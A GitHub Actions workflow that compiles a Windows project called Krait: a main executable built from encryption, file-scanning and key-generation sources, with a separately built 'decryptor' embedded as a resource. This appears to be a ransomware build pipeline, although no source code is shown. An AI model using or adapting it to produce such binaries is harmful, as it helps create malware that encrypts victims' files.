name: Build Krait

on: [push, workflow_dispatch]

jobs:
  build:
    runs-on: windows-latest
    
    steps:
    - uses: actions/checkout@v4
    
    - name: Fix folder name (scr → src)
      run: |
        if (Test-Path scr) { Rename-Item scr src }
    
    - name: Install vcpkg and libsodium
      run: |
        git clone https://github.com/Microsoft/vcpkg.git
        cd vcpkg
        .\bootstrap-vcpkg.bat
        .\vcpkg install libsodium:x64-windows-static
        echo "VCPKG_ROOT=$env:GITHUB_WORKSPACE\vcpkg" >> $env:GITHUB_ENV
    
    - name: Install mingw
      run: |
        choco install mingw -y
        echo "C:\mingw64\bin" >> $GITHUB_PATH
    
    - name: Build decryptor
      run: |
        g++ -O2 -s -static -std=c++17 -I src -I vcpkg\installed\x64-windows-static\include decryptor/main.cpp src/encryption.cpp src/keygen.cpp src/utils.cpp -o KRAIT_DECRYPTOR.exe -L vcpkg\installed\x64-windows-static\lib -ladvapi32 -luser32 -lgdi32 -lshell32 -liphlpapi -lwbemuuid -lcrypt32 -lws2_32 -lsodium
    
    - name: Copy decryptor to resources
      run: |
        Copy-Item KRAIT_DECRYPTOR.exe resources\KRAIT_DECRYPTOR.exe
    
    - name: Build resources
      run: |
        windres resources/resource.rc -O coff -o resources/resource.res
    
    - name: Build main
      run: |
        g++ -O2 -s -static -std=c++17 -I src -I vcpkg\installed\x64-windows-static\include src/main.cpp src/encryption.cpp src/file_scanner.cpp src/keygen.cpp src/utils.cpp resources/resource.res -o KRAIT.exe -L vcpkg\installed\x64-windows-static\lib -ladvapi32 -luser32 -lgdi32 -lshell32 -liphlpapi -lwbemuuid -lcrypt32 -lws2_32 -lsodium
    
    - name: Upload artifacts
      uses: actions/upload-artifact@v4
      with:
        name:
